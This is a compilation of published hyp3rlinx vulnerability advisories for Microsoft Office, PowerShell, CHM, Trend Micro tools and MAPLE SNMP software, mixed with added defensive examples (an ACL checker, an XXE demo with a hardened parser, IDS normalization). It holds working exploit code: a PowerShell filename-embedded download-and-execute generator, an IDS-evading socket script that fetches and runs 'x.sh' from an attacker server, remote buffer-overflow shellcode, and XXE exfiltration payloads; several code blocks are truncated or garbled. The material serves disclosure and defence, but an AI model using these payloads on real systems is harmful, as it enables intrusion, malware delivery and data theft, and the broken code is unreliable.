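WEAK_PRINCIPALS = {"everyone", "builtin\\users", "builtin\\guests",
                   "nt authority\\authenticated users", "nt authority\\interactive"}
WRITE_RIGHTS = {"F", "C", "W"}       # Full, Change and Write all allow replacing the file

SAMPLE_CACLS = r"""
C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F
C:\Program Files\Max Secure Anti Virus Plus\MaxSDUI.exe NT AUTHORITY\Authenticated Users:(ID)F
                                                        BUILTIN\Users:(ID)F
                                                        NT AUTHORITY\SYSTEM:(ID)F
                                                        BUILTIN\Administrators:(ID)F
C:\Program Files\Well Behaved AV\scanner.exe BUILTIN\Users:(ID)R
                                             NT AUTHORITY\SYSTEM:(ID)F
                                             BUILTIN\Administrators:(ID)F
"""


def parse_cacls(output):
    """Map each path to its list of (principal, flags, right) ACEs."""
    entries, current = {}, None
    for line in output.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():                       # continuation ACE for the current path
            m = NEXT_LINE.match(line)
            if m and current:
                entries[current].append((m["who"], m["flags"], m["right"]))
            continue
        m = FIRST_LINE.match(line.rstrip())
        if m:
            current = m["path"]
            entries[current] = [(m["who"], m["flags"], m["right"])]
        else:
            current = None                          # e.g. the command prompt line itself
    return entries


def writable_by_standard_users(output):
    """(path, principal, right) for every ACE that lets a non-admin principal modify the file."""
    hits = []
    for path, aces in parse_cacls(output).items():
        for who, _flags, right in aces:
            if who.lower() in WEAK_PRINCIPALS and right in WRITE_RIGHTS:
                hits.append((path, who, right))
    return hits


if __name__ == "__main__":
    for path, who, right in writable_by_standard_users(SAMPLE_CACLS):
        print("[!] %s writable by %s (%s)" % (path, who, right))
```

Feed it `cacls "C:\Program Files\<product>\*" /s` output (or `icacls`, after adapting the right letters) and any hit on a binary that a SYSTEM service or an elevated UI later executes is the same primitive the PoC uses against MaxSDUI.exe.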
Microsoft Excel 2016 v1901 Import Error XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Excel 2016 v1901

Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS. It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications.

[CVE]
N/A

[Vulnerability Type]
Error Import Based XML External Entity Injection

[Security Issue]
Excel's "query from file" feature is vulnerable to "error"-based XML External Entity attacks if, after receiving errors while importing a specially crafted XML file, the user chooses the "Import as Html page" option. This can result in remote data exfiltration; user interaction is required to exploit this vulnerability.

Tested successfully on Windows 10 with .NET Framework v4.0.30319.

C:\>dir /b %windir%\Microsoft.NET\Framework\v*
v4.0.30319

[Exploit/POC]
Create a new ".xlsx" file, then go to the Data tab, choose 'New Query/From File/From XML' and select the malicious XML file.

1) You will get an error like:

"Error: Unable to connect
We encountered an error while trying to connect."

2) Excel then offers an 'Edit' option, from which the file can be imported as an 'Html Page' via the drop-down menu. If the user chooses to import as HTML, the XXE attack succeeds and local data is exfiltrated to the remote server, e.g. (the beginning of C:\Windows\win.ini):

127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO HTTP/1.1" 200 -

Malicious XML file to load as the New Data Query, "test.xml":

http://127.0.0.1:8000/payload.dtd'> %dtd;]>

[Network Access]
Local

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: May 10, 2019
MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release. Engineering Team may or may not fix in a future version of the release."
November 30, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
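The chain both the Windows Media Center .mcl advisory and the Excel advisory above depend on, run end to end on localhost, as an added example that is not code from either advisory: the document pulls a DTD from the attacker's web server, that DTD reads a local file into a parameter entity and splices it into the URL of a second entity, and when the parser resolves that entity the file contents land in the attacker's access log. Everything here is constructed: the secret file, the server on 127.0.0.1, the entity names and the `payload.dtd` path. The parser is Python's expat driven the way a naive "resolve external entities" implementation would behave, next to a hardened handler that refuses every external fetch; nothing in the block touches Windows, Office, Media Center or the mark-of-the-web.

```python
"""Out-of-band XXE through an attacker-hosted DTD, demonstrated offline.

Added example, not from either advisory. The vulnerable handler fetches every
SYSTEM identifier it is handed (http and file alike); the hardened one refuses.
"""
import pathlib
import tempfile
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from xml.parsers import expat

OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))   # never go through a proxy

DTD_TEMPLATE = (
    '<!ENTITY % file SYSTEM "{file_url}">\n'
    '<!ENTITY % wrap "<!ENTITY send SYSTEM \'http://127.0.0.1:{port}/?d=%file;\'>">\n'
    '%wrap;\n')
DOC_TEMPLATE = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE data [<!ENTITY % dtd SYSTEM "http://127.0.0.1:{port}/payload.dtd"> %dtd;]>\n'
    '<data>&send;</data>\n')


class AttackerHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.server.seen.append(self.path)                 # the "access log"
        body = self.server.dtd.encode() if self.path == "/payload.dtd" else b""
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):                           # keep stderr quiet
        pass


def install_entity_handler(parser, allow_external, refused):
    """Resolve (or refuse) external entities; child parsers get the same handler."""
    def on_external_entity(context, base, system_id, public_id):
        if not allow_external:
            refused.append(system_id)                       # hardened: record and skip
            return 1
        data = OPENER.open(system_id, timeout=5).read()     # vulnerable: fetch anything
        child = parser.ExternalEntityParserCreate(context)
        install_entity_handler(child, allow_external, refused)
        child.Parse(data, True)
        return 1
    parser.ExternalEntityRefHandler = on_external_entity


def run_demo(allow_external):
    """Return (paths seen by the attacker server, URLs the hardened handler refused)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as secret:
        secret.write("SECRET123")                           # one token, URL-safe, no newline
    server = HTTPServer(("127.0.0.1", 0), AttackerHandler)
    server.seen, refused = [], []
    port = server.server_address[1]
    server.dtd = DTD_TEMPLATE.format(file_url=pathlib.Path(secret.name).as_uri(), port=port)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        parser = expat.ParserCreate()
        parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
        install_entity_handler(parser, allow_external, refused)
        try:
            parser.Parse(DOC_TEMPLATE.format(port=port).encode(), True)
        except expat.ExpatError:
            pass            # by the time a parse error surfaces the callback has already fired
        return list(server.seen), refused
    finally:
        server.shutdown()
        server.server_close()
        pathlib.Path(secret.name).unlink()


if __name__ == "__main__":
    print("vulnerable parser, server saw:", run_demo(True)[0])
    print("hardened parser, refused:", run_demo(False)[1])
```

With the vulnerable handler the server log shows `/payload.dtd` followed by `/?d=SECRET123`; with the hardened handler it shows nothing and the only refused URL is the DTD itself, because once the external subset is never loaded the `send` entity is never declared. That is the property to verify in any XML-consuming feature: the parser must not fetch external DTDs or entities at all, not merely warn about the file's origin.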
Trend Micro Anti-Threat Toolkit <= v1.62.0.1218 / Remote Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt
[+] ISR: Apparition Security

[Vendor]
www.trendmicro.com

[Product]
Trend Micro Anti-Threat Toolkit (ATTK) 1.62.0.1218 and below

Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean infections. It can be used to perform system forensic scans and clean the following infection types: general malware infection, master boot record infection, CIDOX/RODNIX infection, rootkit infection, Zbot infection, Cryptolocker infection, etc.

[Vulnerability Type]
Remote Code Execution

[CVE Reference]
CVE-2019-9491

[Security Issue]
Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE files if a malware author happens to use the vulnerable naming convention "cmd.exe" or "regedit.exe" and the malware is placed in the vicinity of the ATTK when a scan is launched by the end user. Since the ATTK is signed by a verified publisher and is therefore assumed trusted, any MotW security warnings are bypassed if the malware was downloaded from the internet. It can also become a persistence mechanism, since each time the Anti-Threat Toolkit is run, so is the attacker's malware.

Standalone affected components of ATTK and other integrations (e.g. WCRY Patch Tool, OfficeScan Toolbox, etc.):

attk_collector_cli_x64.exe
Hash: e8503e9897fd56eac0ce3c3f6db24fb1

TrendMicroRansomwareCollector64.r09.exe
Hash: 798039027bb4363dcfd264c14267375f

attk_ScanCleanOnline_gui_x64.exe
Hash: f1d2ca4b14368911c767873cdbc194ed

[References]
https://success.trendmicro.com/solution/000149878
*All versions of the ATTK have been updated to the newer version, Anti-Threat Toolkit (ATTK) 1.62.0.1223.

[Exploit/POC]
Compile an .EXE from the "C" code below and name it "cmd.exe" or "regedit.exe". Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed.

#include <windows.h>
#include <stdio.h>

void main(void){
    puts("Trend Micro Anti-Threat Toolkit PWNED!");
    puts("Discovery: hyp3rlinx");
    puts("CVE-2019-9491\n");
    WinExec("powershell", 0);
}

[POC Video URL]
https://www.youtube.com/watch?v=HBrRVe8WCHs

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: September 9, 2019
Vendor confirms vulnerability: September 25, 2019
Vendor requests to coordinate advisory: September 25, 2019
October 19, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
NtFileSins v2.1 Windows NTFS Privileged File Access Enumeration Tool
from subprocess import Popen, PIPE
import sys, argparse, re

# NtFileSins v2.1
# Fixed: save() logic to log report in case no Zone.Identifiers found.
# Added: Check for Zone.Identifier:$DATA to see if any identified files were downloaded from the internet.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# whether a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, by accessing files directly, attempting to "open" them from the cmd.exe shell,
# we can determine existence by comparing inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges (not admin to admin).
#               2) artifacts must contain a dot "." or false positives are returned.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin, so this script is not required.
#
# Profile other users by comparing NTFS error messages to potentially learn their activities or a machine's purpose.
# For evil, or maybe to check for basic malware IOC existence on disk with user-only rights.
#
#==#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1
#
# By John Page (aka hyp3rlinx)
#
# Apparition Security
#==#

BANNER = r'''
    _   ____  _______ __     _____ _
   / | / / /_/ ____(_) /__  / ___/(_)___  _____
  /  |/ / __/ /_  / / / _ \ \__ \/ / __ \/ ___/
 / /|  / /_/ __/ / / /  __/___/ / / / / (__  )
/_/ |_/\__/_/   /_/_/\___//____/_/_/ /_/____/
                            v2.1 By hyp3rlinx ApparitionSec
'''

sin_cnt = 0
internet_sin_cnt = 0
found_set = set()
zone_set = set()
ARTIFACTS_SET = set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER = ":Zone.Identifier:$DATA"
USER_DIRS = ["Contacts", "Desktop", "Downloads", "Favorites", "My Documents", "Searches", "Videos/Captures",
             "Pictures", "Music", "OneDrive", "OneDrive/Attachments", "OneDrive/Documents"]
APPDATA_DIR = ["AppData/Local/Temp"]
EXTS = set([".contact", ".url", ".lnk", ".search-ms", ".exe", ".csv", ".txt", ".ini", ".conf", ".config", ".log",
            ".pcap", ".zip", ".mp4", ".mp3", ".bat", ".wav", ".docx", ".pptx", ".reg", ".vcf", ".avi", ".mpg",
            ".jpg", ".jpeg", ".png", ".rtf", ".pdf", ".dll", ".xml", ".doc", ".gif", ".xls", ".wmv"])
REPORT = "NtFileSins_Log.txt"


def usage():
    print("NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n")
    print('-u victim -d Searches -a "MS17-020 - Google Search.url"')
    print('-u victim -a ""')
    print("-u victim -d Downloads -a -s")
    print('-u victim -d Contacts -a "Mike N.contact"')
    print("-u victim -a APT.txt -b -n")
    print("-u victim -d -z Desktop/MyFiles -a <.name>")
    print("-u victim -d Searches -a .search-ms")
    print("-u victim -d . -a ")
    print("-u victim -d desktop -a inverted-crosses.mp3 -b")
    print("-u victim -d Downloads -a APT.exe -b")
    print("-u victim -f list_of_files.txt")
    print("-u victim -f list_of_files.txt -b -s")
    print("-u victim -f list_of_files.txt -x .txt")
    print("-u victim -d desktop -f list_of_files.txt -b")
    print("-u victim -d desktop -f list_of_files.txt -x .rar")
    print("-u victim -z -s -f list_of_files.txt")


def parse_args():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--user", help="Privileged user target")
    parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search .")
    parser.add_argument("-a", "--artifact", help="Single artifact we want to verify e
Microsoft Windows PowerShell Unsanitized Filename Command Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: Apparition Security

[Vendor]
www.microsoft.com

[Product]
Windows PowerShell

Windows PowerShell is a Windows command-line shell designed especially for system administrators. PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination.

[Vulnerability Type]
Unsanitized Filename Command Execution

[CVE Reference]
N/A

[Security Issue]
PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames. This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file; or the running of unexpected commands straight from the filename itself without the need for a second file.

For trojan files it doesn't need to be another PowerShell script and can be one of the following: ".com, .exe, .bat, .cpl, .js, .vbs and .wsf". Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.

However, when such scripts are run from PowerShell's shell and not "cmd.exe" the "&" (call operator) will block our exploit from working. Still, if the user has enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double clicking the file to trigger the exploit and the "& call operator" will no longer save you.

Also, if the user has not enabled PowerShell to open .ps1 scripts as default, then running the script from cmd.exe like:

c:\>powershell "\Hello;World.ps1"

will also work without dropping into the PowerShell shell.

My PoC will download a remote executable, save it to the victim's machine and then execute it, and the PS file's contents are irrelevant. Also, note I use "%CD" to target the current working directory where the victim has initially opened it; after it calls "iwr" (invoke-webrequest, abbreviated for space) it sleeps for 2 seconds and finally executes.

C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

This can undermine the integrity of PowerShell as it potentially allows unexpected code execution, even when the script's contents are visually reviewed. We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename, where our commands can be stored.

For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files.

First, we create a Base64 encoded filename for obfuscation that will download and execute a remote executable, named in this case "n.exe".

c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

Give the PS script a normal beginning name, then separate commands using ";" semicolon e.g.

Test;powershell -e ;2.ps1

Create the executable without a file extension to save space for the filename, then save it back using the -O parameter. The "-e" is abbreviated for EncodedCommand to again save filename space.

Host the executable on a web-server or just use python -m SimpleHTTPServer 80 or whatever.

Double click to open in PowerShell, watch the file get downloaded, saved and executed!

My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.

Note: User interaction is required, and obviously running any random PS script is dangerous... but hey, we looked at the file content and it simply printed a string!

[Exploit / PoC]

from base64 import b64encode
import argparse,sys

#Windows PowerShell - Unsanitized Filename Command Execution Vulnerability PoC
#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
#Expects hostname/ip-addr of web-server housing the exploit.
#By hyp3rlinx
#Apparition Security
#

def parse_args():
    parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
    parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
    return parser.parse_args()

def main(args):
    PSEmbedFilenameMalwr=""
    if args.ipaddress:
        PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start
Trend Micro Deep Discovery Inspector IDS / Percent Encoding IDS Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt
[+] ISR: Apparition Security

[Vendor]
www.trendmicro.com

[Product]
Deep Discovery Inspector

Deep Discovery Inspector is a network appliance that monitors all ports and over 105 different network protocols to discover advanced threats and targeted attacks moving in and out of the network and laterally across it. The appliance detects and analyzes malware, command-and-control (C&C) communications, and evasive attacker activities that are invisible to standard security defenses.

[Vulnerability Type]
Percent Encoding IDS Bypass

[CVE Reference]
Vendor decided not to release a CVE

[Security Issue]
Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for malicious system commands like "Wget Commandline Injection" and they will be flagged as high. Attacker payloads sent with normal ascii characters, for example "wget", or even if they have been HEX encoded like "\x77\x67\x65\x74", will still get flagged and alerted on.

However, attackers can easily bypass these alerts by sending malicious commands in HEX preceded by percent sign chars "%", e.g. "%77%67%65%74", which also translates to "wget" and will not get flagged or alerted on and may still be processed on the target system.

e.g. DDI RULE 2452
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452

Therefore, Trend Micro IDS alerts can be easily bypassed and the payload is still run by the vulnerable target if the payload is encoded using percent/hex encoding like %77%67%65%74. That will not only bypass the IDS by having no alert triggered or notification sent, but the application will still process the malicious command.

Importantly, the "wget" DDI Rule 2452 used is just an example and can potentially be any malicious request where the IDS checks the character encodings but fails to account for percent encoded HEX character payload values.

[Exploit/POC]

from socket import *

#Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC
#Discovery: hyp3rlinx - ApparitionSec
#Apparition Security
#Firewall Rule Bypass

IP = raw_input("[+] Trend Micro IDS")
PORT = 80

payload="/index.php?s=/index/vulnerable/app/invoke=call_user_func_array[0]=system[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a;"

req = "GET "+payload+" HTTP/1.1\r\nHost"+IP+"\r\nConnection: close\r\n\r\n"

s=socket(AF_INET, SOCK_STREAM)
s.connect((IP, PORT))
s.send(req)

res=""
while True:
    res = s.recv(512)
    print res
    if res=="\n" or "":
        break
s.close()

#Result is 200 HTTP OK and code execution on vuln app and No IDS Alert gets triggered.

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: May 14, 2019
Vendor confirmed the IDS Bypass: May 20, 2019
Vendor informed that a DDI IDS enhancement has been made: July 18, 2019
July 23, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
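The defensive counterpart of the bypass above is to canonicalize the request before signature matching: percent-decode (repeatedly, for double encoding) and unescape "\x" hex before looking for "wget". This is an added illustration, not Trend Micro's code or the advisory's PoC; the request lines are constructed samples and "example.invalid" is a placeholder host.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines (not from the advisory): the same "wget"
# token written plain, as \x-escaped hex, as percent-encoded hex, and as
# double percent-encoded hex, plus one benign request.
SAMPLE_REQUESTS = [
    "GET /index.php?cmd=wget%20http://example.invalid/x.sh HTTP/1.1",
    "GET /index.php?cmd=\\x77\\x67\\x65\\x74%20http://example.invalid/x.sh HTTP/1.1",
    "GET /index.php?cmd=%77%67%65%74%20http://example.invalid/x.sh HTTP/1.1",
    "GET /index.php?cmd=%2577%2567%2565%2574 HTTP/1.1",
    "GET /images/logo.png HTTP/1.1",
]

# A minimal signature table in the spirit of DDI rule 2452 (assumed, not the
# vendor's rule): a bare "wget" token anywhere in the request.
SIGNATURES = {"wget-commandline": re.compile(r"\bwget\b", re.IGNORECASE)}


def decode_hex_escapes(text):
    """Turn C-style \\xHH escapes into the characters they denote."""
    return re.sub(r"\\x([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), text)


def normalize(text, max_rounds=3):
    """Percent-decode and \\x-decode until the string stops changing.

    Each round undoes one layer of encoding, so "%2577" becomes "%77" and
    then "w". max_rounds bounds the work on adversarial input.
    """
    prev = None
    rounds = 0
    while prev != text and rounds < max_rounds:
        prev = text
        text = decode_hex_escapes(unquote(text))
        rounds += 1
    return text


def match_signatures(line, normalize_first=True):
    """Return the sorted signature names that fire on one request line."""
    text = normalize(line) if normalize_first else line
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def scan(lines, normalize_first=True):
    """Map each request line to the signatures it triggers."""
    return {line: match_signatures(line, normalize_first) for line in lines}


if __name__ == "__main__":
    for mode in (False, True):
        print("normalize_first =", mode)
        for line, hits in scan(SAMPLE_REQUESTS, mode).items():
            print("  ", hits or "-", line)
```

Without normalization only the plain "wget" line matches; with it, all three encoded variants match as well while the benign request stays clean.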
CVE-2019-13577 / MAPLE Computer WBT SNMP Administrator v2.0.195.15 / Unauthenticated Remote Buffer Overflow Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt
[+] ISR: Apparition Security

[Vendor]
www.computerlab.com

[Product]
MAPLE Computer WBT SNMP Administrator (Thin Client Administrator) v2.0.195.15

https://www.computerlab.com/index.php/downloads/category/27-device-manager
ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE

SnmpSetup.195.15.EXE MD5 File Hash: a3913aae166c11ddd21dca437e78c3f4

The CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients. This software is built on the TCP/IP industry standard SNMP (Simple Network Communication Protocol). Agents are built into the clients for remote management and configuration.

[Vulnerability Type]
Unauthenticated Remote Buffer Overflow Code Execution 0day

[CVE Reference]
CVE-2019-13577

[Security Issue]
SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated Remote Buffer Overflow via a long string to the CE Remote feature listening on Port 987. This will overwrite data on the stack/registers and allow for control of the program's execution flow, resulting in attacker supplied remote code execution. Authentication is not required for this exploit.

This program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code.

When installing the vulnerable program, if it asks for a serial number just enter a value of "1" or something. Upon launching the program, if any errors occur try right click SnmpAdm.exe and run it as Admin.

Interestingly, it seems to drop DLLs with .tmp extensions in the AppData\Local\Temp directory; make OS system files viewable in explorer to see them.

e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp

ASLR / SEH are all set to False which helps to make exploitation more portable.

CALL EBX 10008FB3
0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll)

Stack dump:

EAX 41414141
ECX 0018FEFC
EDX 0018FF10
EBX 022DDA78 ASCII "AAA
ESP 0018FECC
EBP 0018FEF4
ESI 0018FF10
EDI 0018FEFC
EIP 41414141
C 0 ES 002B 32bit 0()
P 1 CS 0023 32bit 0()
A 0 SS 002B 32bit 0()
Z 0 DS 002B 32bit 0()
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0()
D 0
O 0 LastErr ERROR_NO_SCROLLBARS (05A7)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)

[Exploit/POC]

from socket import *
import struct,sys,argparse

#MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15
#CVE-2019-13577
#Remote Buffer Overflow 0day
#hyp3rlinx - ApparitionSec

#Pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
    "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
    "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
    "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
    "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
    "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
    "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

eip = struct.pack(" 1:
    print "[*] No args supplied see Help -h"
    exit()

main(parse_args())

[POC Video URL]
https://www.youtube.com/watch?v=THMqueCIrFw

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: July 10, 2019
Second vendor notification attempt: July 13, 2019
No vendor replies.
July 17, 2019 : Public Disclosure
[**Fixed Typo] Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft Compiled HTML Help "hh.exe"

Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, an index and other navigation tools. The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is often used for software documentation. CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.

[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection

[CVE Reference]
N/A

[Security Issue]
CHM Files are usually created using Microsoft's "HTML Help Workshop" program. However, I found a way to bypass using this program and create them easily by simply adding a double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it, processing any JS/HTML/XML inside etc.

Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate local system files.

What's interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. Also, we can steal files without having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.

While CHM is already considered a "dangerous" file type and other types of attacks have already been documented, I thought this was an interesting way to create CHM files "Uncompiled", bypassing the default creation steps while stealing local files in the process.

Note: User interaction is required to exploit this vulnerability.

[Exploit/POC]

1) python -m SimpleHTTPServer

2) "XXE.chm.chm" Uncompiled CHM File XXE PoC

http://localhost:81/payload.dtd;> %dtd;]>

3) "payload.dtd" (hosted in python web-server dir port 81 above)

http://localhost:81?%file;'>"> %all;

Open the "XXE.chm.chm" file and it will exfil the Windows "system.ini"; the attacker server IP is set to localhost using port 81 for the PoC.

Tested successfully Windows 7/10

[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by design"
July 16, 2019 : Public Disclosure
Microsoft Word (2016) Deceptive File Reference ZDI-CAN-7949
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WORD-DECEPTIVE-FILE-REFERENCE.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program

[Vendor]
www.microsoft.com

[Product]
Microsoft Word 2016

[Vulnerability Type]
Deceptive File Reference

[References]
ZDI-CAN-7949

[Security Issue]
